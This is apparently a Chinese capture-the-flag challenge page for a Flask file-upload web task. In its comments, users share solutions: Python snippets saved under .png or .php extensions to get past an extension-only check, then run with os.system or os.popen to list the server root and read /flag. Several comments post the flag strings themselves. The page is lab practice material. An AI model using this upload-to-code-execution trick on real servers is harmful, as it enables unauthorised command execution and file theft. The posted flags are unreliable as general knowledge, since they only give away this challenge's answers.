Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12649
提  示:
描  述:
Flask_FileUpload
评论
18835508637 1年前

flag{8b6840315d0d9b357abeb8cfe1dbeb5a}

回复 0

tot1987 1年前

新建txt,输入: import os os.system('ls /') 保存为a.png,然后上传,发现根目录下有个flag, 然后在修改txt内容为: import os os.system('cat /flag') 保存后,再上传,在新页面中查看源码,得到flag

回复 8

Chibits 1年前

import os os.chdir('..') print(os.listdir('.')) os.system('cat flag')

回复 0

不会写代码的菜鸟 1年前

作为一个没学过python的小菜鸡,能告诉我为啥要import os吗?我还以为直接 LS cat /flag就可以

回复 0
Life000 1年前

因为python执行系统命令需要os这个库

回复 0

q1152874733 1年前

这个代码只检查文件后缀对不对,需要将python代码文件后缀改为php上传 并查看返回页面源代码 代码如下: import os os.system('cat /flag')

回复 0

FlameBoi 1年前

flag{cfce8279b65a15b42879b886db3f1494}

回复 0

sz007 1年前

flag{092017928b9865cd04c22a483305dca8}

回复 0

ほしの) アイ 1年前

flag{6bbca2dbdad2a17b0920389d8f611a45}

回复 0

3052551457 1年前

flag{4e1fbadc7e2977b1ed30ecd944e9343a}

回复 0

alkaid45 1年前

import os print(os.popen('cat /flag').read())

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

cha8e1 攻破了该题 3小时前
yehlg 攻破了该题 1天前
yu'c 攻破了该题 1天前
avaclaire 攻破了该题 1天前
Kernel1 攻破了该题 1天前
脚本gay 攻破了该题 2天前
YS_JW 攻破了该题 2天前
池屿 攻破了该题 3天前
wujita01 攻破了该题 3天前
hsk_zy 攻破了该题 4天前
zhuguangsen 攻破了该题 4天前
Hackerchen 攻破了该题 4天前
mmhhdm 攻破了该题 4天前
yangyy 攻破了该题 4天前
simple9527 攻破了该题 4天前
bugfuck2 攻破了该题 4天前
Motona_Sky 攻破了该题 6天前
kitniu 攻破了该题 8天前
nanaqilin 攻破了该题 11天前
锅碗瓢盆 攻破了该题 12天前
问题反馈